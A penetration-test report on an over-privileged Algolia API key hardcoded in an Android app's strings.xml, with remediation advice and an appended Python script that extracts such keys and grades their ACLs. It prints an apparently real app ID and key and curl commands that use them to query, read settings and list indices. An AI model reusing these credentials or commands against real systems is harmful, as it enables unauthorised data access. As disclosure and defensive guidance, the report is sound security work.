### Pentest Report: Exploitation of Exposed Algolia API Credentials

#### Title: Exploitation of Exposed Algolia API Credentials in Mobile APK Source Code

#### Description:

The Algolia Application ID and an API key named `ALGOLIA_CLIENT_SEARCH_API_KEY` are hardcoded in the `res/values/strings.xml` file of the mobile APK. The Application ID on its own is not a secret, and Algolia search-only keys are designed to be shipped inside client applications, so the severity of this finding is determined by the ACLs granted to the key rather than by its mere presence in the APK. The key in question accepts requests to the index-settings and list-indices endpoints, which Algolia gates behind the `settings` and `listIndexes` ACLs, so it is scoped more broadly than a search-only key. Anyone who extracts it from the APK can search every index, enumerate index names and read index configuration; depending on what further ACLs the key carries, they may also be able to browse private data or modify index settings.

#### Steps to Reproduce:

1. Decompile the APK file using a tool such as `apktool`.
2. Navigate to the `res/values/strings.xml` file.
3. Locate the lines containing the Algolia credentials:
   ```xml
   <string name="ALGOLIA_APP_ID">X5UKSETF9T</string>
   <string name="ALGOLIA_CLIENT_SEARCH_API_KEY">d010c7f0e3964432dd752c249d81a6d2</string>
   ```
4. Use the credentials to make authenticated requests to the Algolia API.

#### Examples of Exploitation:

The first request would succeed with any search key; the second and third succeed only because this key carries the `settings` and `listIndexes` ACLs in addition to `search`.

##### 1. **Perform a Search on an Index**:

- **Command**:
  ```sh
  curl -X POST \
    -H "X-Algolia-Application-Id: X5UKSETF9T" \
    -H "X-Algolia-API-Key: d010c7f0e3964432dd752c249d81a6d2" \
    -H "Content-Type: application/json" \
    --data '{"query": "example query"}' \
    https://X5UKSETF9T-dsn.algolia.net/1/indexes/production_document/query
  ```
- **Response**:
  ```json
  {
    "hits": [
      {
        "id": 83761630,
        "title": "SQL",
        "description": "Example Query",
        "published_at": 1707479225,
        "rating": 0,
        "rating_positive": 0,
        "rating_negative": 0,
        "positive_experience_probability": 0.5,
        "premium": false,
        "thumbnail_sizes": {"115": "163", "300": "424", "1200": "1697"},
        "language": "en",
        "pages": 1,
        "object_key": "56af8c5ba74c556306c36e8c4fe88be1",
        "category_id": 3,
        "category_translated_name": "Lecture notes",
        "course": {
          "id": 2318330,
          "name": "Introduction to Relational Databases",
          "code": "CS1106",
          "institution": {
            "id": 5210,
            "name": "University College Cork",
            "country_id": 87,
            "language_id": 23,
            "region_code": "en-ie"
          }
        },
        "institution": {
          "id": 5210,
          "name": "University College Cork",
          "country_id": 87,
          "language_id": 23,
          "region_code": "en-ie"
        },
        "academic_years": [2022, 2023],
        "academic_year": "2022/2023"
      },
      ...
    ],
    "nbHits": 66,
    "page": 0,
    "nbPages": 4,
    "hitsPerPage": 20,
    "query": "example query",
    "params": "query=example+query",
    "processingTimeMS": 17
  }
  ```

##### 2. **Check Index Settings**:

- **Command**:
  ```sh
  curl -X GET \
    -H "X-Algolia-Application-Id: X5UKSETF9T" \
    -H "X-Algolia-API-Key: d010c7f0e3964432dd752c249d81a6d2" \
    https://X5UKSETF9T-dsn.algolia.net/1/indexes/production_document/settings
  ```
- **Response**:
  ```json
  {
    "settings": {
      "attributesToIndex": ["title", "description"],
      "ranking": ["typo", "geo", "words", "filters", "proximity", "attribute", "exact", "custom"],
      "customRanking": ["desc(rating)"],
      ...
    }
  }
  ```

##### 3. **List All Indices**:

- **Command**:
  ```sh
  curl -X GET \
    -H "X-Algolia-Application-Id: X5UKSETF9T" \
    -H "X-Algolia-API-Key: d010c7f0e3964432dd752c249d81a6d2" \
    https://X5UKSETF9T-dsn.algolia.net/1/indexes/
  ```
- **Response**:
  ```json
  {
    "items": [
      {
        "name": "production_book",
        "createdAt": "2023-01-01T00:00:00Z",
        ...
      },
      {
        "name": "production_chat_group",
        "createdAt": "2023-01-01T00:00:00Z",
        ...
      },
      ...
    ]
  }
  ```

#### Business Impact:

The exposure of an over-privileged Algolia API key can lead to the following business impacts:

- Unauthorized access to search data and insights, including the full list of indices and their configuration.
- Potential manipulation of search results, if the key also carries write ACLs.
- Unauthorized access to private indices and data leakage.
- Service abuse leading to increased costs, since the key has no query rate limit or index restriction visible in the responses above.
- Damage to reputation and user trust if sensitive data is exposed.

#### Recommendations:

1. **Revoke and Regenerate API Keys**:
   - Immediately revoke the exposed key in the Algolia dashboard and issue a replacement.
   - Scope the replacement client key to the `search` ACL only, restrict it to the indices the app actually needs, and set per-IP query and hit limits. Keys carrying `settings`, `listIndexes`, `browse` or any write ACL belong on the server only.
   - Where searches must be constrained per user, generate Algolia Secured API keys on the backend with the appropriate filters and expiry rather than shipping a broader key in the app.
2. **Secure Key Management**:
   - Use environment variables or a secure vault service so that keys are not committed to source control or leaked through build logs. Note that any key compiled into the APK can still be recovered from a device by the steps above, so this protects server-side keys but does not make a client-side key secret.
   - Ensure the build process embeds nothing but the intended, least-privileged client key in the APK.
3. **Regular Security Audits**:
   - Conduct regular security audits and code reviews, including a review of the ACLs and restrictions on every Algolia key, to ensure no over-privileged key is exposed.
   - Use automated tools to scan the codebase and build artifacts for hardcoded secrets before release.

By following these recommendations, you can limit what a key recovered from the app is able to do and reduce the overall risk to the application.
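The reproduction steps above, extracting the values from a decompiled `strings.xml` and then establishing what the key can actually do, as an added Python example that is not part of the original report. It parses a constructed `strings.xml` with made-up values, builds the request for Algolia's `GET /1/keys/{key}` endpoint (which returns a key's ACLs, index restrictions and rate limits; a key is used here to read its own record), and grades the key from that record instead of probing endpoints one by one. The live lookup is isolated in `fetch_key_info` and is not made unless `--live` is passed; the constructed `SAMPLE_KEY_INFO` mirrors the ACLs the report's key is shown to have. The `-dsn` host, the severity thresholds and the heuristic for recognising credential names in `strings.xml` are this example's own assumptions.

```python
"""Added example (not from the original report): extract Algolia credentials
from a decompiled strings.xml and grade the key by the ACLs Algolia reports
for it. Values, thresholds and name heuristics are this example's assumptions."""
import json
import sys
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample of res/values/strings.xml with made-up values.
SAMPLE_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">ExampleApp</string>
    <string name="ALGOLIA_APP_ID">APPID12345</string>
    <string name="ALGOLIA_CLIENT_SEARCH_API_KEY">00112233445566778899aabbccddeeff</string>
</resources>
"""

# Constructed response for GET /1/keys/{key}, shaped like Algolia's key record
# and carrying the ACLs the report's key is shown to have.
SAMPLE_KEY_INFO = {
    "value": "00112233445566778899aabbccddeeff",
    "acl": ["search", "settings", "listIndexes"],
    "createdAt": 1672531200,
    "validity": 0,
    "maxHitsPerQuery": 0,
    "maxQueriesPerIPPerHour": 0,
}

# Any of these lets the holder change data or configuration.
WRITE_ACLS = {"addObject", "deleteObject", "deleteIndex", "editSettings"}
# Read ACLs a public client key should not carry.
READ_ACLS_BEYOND_SEARCH = {"browse", "settings", "listIndexes", "logs",
                           "analytics", "seeUnretrievableAttributes"}


def extract_algolia_credentials(strings_xml):
    """Return the app ID and every key-like ALGOLIA_* string resource."""
    found = {"app_id": None, "api_keys": {}}
    for el in ET.fromstring(strings_xml.encode("utf-8")).iter("string"):
        name = el.get("name", "")
        upper = name.upper()
        if "ALGOLIA" not in upper:
            continue
        value = (el.text or "").strip()
        if "APP_ID" in upper or "APPLICATION_ID" in upper:
            found["app_id"] = value
        elif "KEY" in upper:          # heuristic: assumes key names contain KEY
            found["api_keys"][name] = value
    return found


def build_key_info_request(app_id, api_key):
    """Request for the key's own record, authenticated with that same key."""
    url = f"https://{app_id}-dsn.algolia.net/1/keys/{api_key}"  # host as in the report
    return urllib.request.Request(url, headers={
        "X-Algolia-Application-Id": app_id,
        "X-Algolia-API-Key": api_key,
    })


def fetch_key_info(app_id, api_key, timeout=10):
    """Live lookup; only run against an application you are authorised to test."""
    with urllib.request.urlopen(build_key_info_request(app_id, api_key), timeout=timeout) as resp:
        return json.load(resp)


def assess_key(key_info):
    """Grade a key record: write ACLs are critical, extra read ACLs are high,
    and a search-only key is expected in a client, so it is only noted."""
    acl = set(key_info.get("acl", []))
    write = sorted(acl & WRITE_ACLS)
    extra = sorted(acl & READ_ACLS_BEYOND_SEARCH)
    if write:
        severity = "critical"
    elif extra:
        severity = "high"
    elif "search" in acl:
        severity = "info"
    else:
        severity = "unknown"
    return {
        "severity": severity,
        "write_acls": write,
        "read_acls_beyond_search": extra,
        # Algolia omits "indexes" when the key is not restricted to any.
        "index_scope": key_info.get("indexes") or "all indexes",
        # 0 on these key settings means no limit.
        "unlimited_hits": key_info.get("maxHitsPerQuery", 0) == 0,
        "unlimited_queries": key_info.get("maxQueriesPerIPPerHour", 0) == 0,
    }


if __name__ == "__main__":
    # Usage: python algolia_key_check.py [path/to/strings.xml] [--live]
    paths = [a for a in sys.argv[1:] if not a.startswith("--")]
    xml_text = open(paths[0]).read() if paths else SAMPLE_STRINGS_XML
    creds = extract_algolia_credentials(xml_text)
    for name, key in creds["api_keys"].items():
        info = fetch_key_info(creds["app_id"], key) if "--live" in sys.argv else SAMPLE_KEY_INFO
        print(name, json.dumps(assess_key(info), indent=2))
```

Run without arguments it grades the constructed sample; pointed at the `strings.xml` from an `apktool` output with `--live` it grades the real key. Grading from the key record rather than from trial requests keeps the test to a single read and makes the ACL list itself the evidence in the report.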